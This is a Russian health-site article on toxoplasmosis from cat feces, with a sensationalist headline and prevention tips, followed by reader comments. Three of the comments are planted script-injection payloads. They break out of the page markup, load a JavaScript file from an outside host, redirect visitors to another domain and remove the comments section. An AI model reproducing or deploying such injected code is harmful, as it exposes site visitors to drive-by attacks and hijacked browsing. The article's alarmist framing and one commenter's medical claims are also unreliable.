Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Кошачьи какашки убивают д...  >>  Кошачьи какашки убивают детей! Что делать?
 
Обратная связь
 

Кошачьи какашки убивают детей! Что делать?

Размер шрифта
20 августа 2013 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Эксперты единодушны: кошачьи экскременты несут в себе угрозу для общественного здоровья.

Кошачьи какашки убивают детей! Что делать?

Ежегодный объем кошачьих экскрементов только в нашей стране составляет не менее 1,2 миллиона тонн! И проблема, собственно, заключается не в количестве – изрядная часть этого «добра» заражена микробом (называется Toxoplasma gondii), который вызывает опасное заболевание – токсоплазмоз. В группе особого риска находятся лица с иммунодефицитом и беременные женщины. В последнем случае неизбежно заразится и плод, что приведет к порокам развития нервной системы и глаз.

Кроме того, показано, что токсоплазма повышает риск развития шизофрении, обсессивно-компульсивного расстройства, ревматоидного артрита, злокачественных опухолей мозга и многих других заболеваний, казалось бы, не имеющих ни малейшего отношения к этому гнусному паразиту.

«Содержание токсоплазм в кошачьих экскрементах может представлять собой большую угрозу, чем мы предполагали ранее», – говорит Феллер Торри, глава исследовательской группы. «Эти невероятно живучие паразиты ассоциированы с большим количеством опасных заболеваний».

При этом в местах излюбленного кошачьего обитания концентрация ооцист (одна из жизненных форм токсоплазмы и других простейших паразитов) может превышать 400 на квадратный метр грунта! Это число обескураживает, потому как для заражения достаточно всего одной ооцисты.

Кошки инфицируются токсоплазмой во время поедания зараженных птиц, мышей и других мелких животных. Поэтому очевидно, что основным источником инфекции являются дворовые кошки, а не домашние.

Исследователи предлагают ряд профилактических мер. Следите, чтобы кошек не было на детских площадках и в песочницах, ведь маленькие дети особенно уязвимы к токсоплазмозу. И обязательно надевайте перчатки, если работаете в саду: грязь под ногтями может содержать до сотни ооцист!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

30 августа 2013 в 23:57

Цитировать   |   Пожаловаться

следить надо, чтобы мамы были чаще рядом с детьми, а не сидели часами на лавочках и трепались о всякой ерунде.

Токсаплазмозом болеют единыжды, если его не лечить он сам исчезает через пол года, если мать болела токсоплазмозом до беременности у нее ребенок уже не будет болеть, вырабатывается имунитет. 
В статье забыли указать, что носителями этой болезни являются и собаки в наибольшей степени, а не только кошки. 
И плохо провареное мясо, плохо вымытые фрукты и овощи. Огромное колличество людей переболели этой гадостью и даже об этом не знали, мы всю жизнь соприкасаемся с грязью. Самая первая борьба с этой проблемой, МОЙТЕ РУКИ, фрукты, овощи. Мамаши, смотри чаще на своих детей, а не на манитор компьютера.

2 - zzzzzz

30 июня 2015 в 19:06

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 19:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 23:06

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Всемирная неделя первичного иммунодефицита начинается в Москве!   Беременность: как обезопасить себя и будущего малыша от вирусов   С какого возраста малышам можно давать иммуномодуляторы?   Страшные сны у ребенка – признак того, что его обижают в школе! Что делать?  
03 октября 2013Результаты благотворительного марафона «Всем миром» 17 июля 2013Будет ли ваш ребенок толстым – теперь это можно понять уже в 2 месяца!
 
10 июля 2013От того, что ест беременная женщина, зависит ум ее ребенка 08 июля 2013Теперь можно выбрать, какой ребенок у вас будет! ЭКО открывает новые горизонты
 

Слайдшоу

1
Можно ли пережить беременность без рвоты?
Убийцы в вашей ванной
Можно ли подгадать с беременностью?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Что вы знаете о грудном вскармливании?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.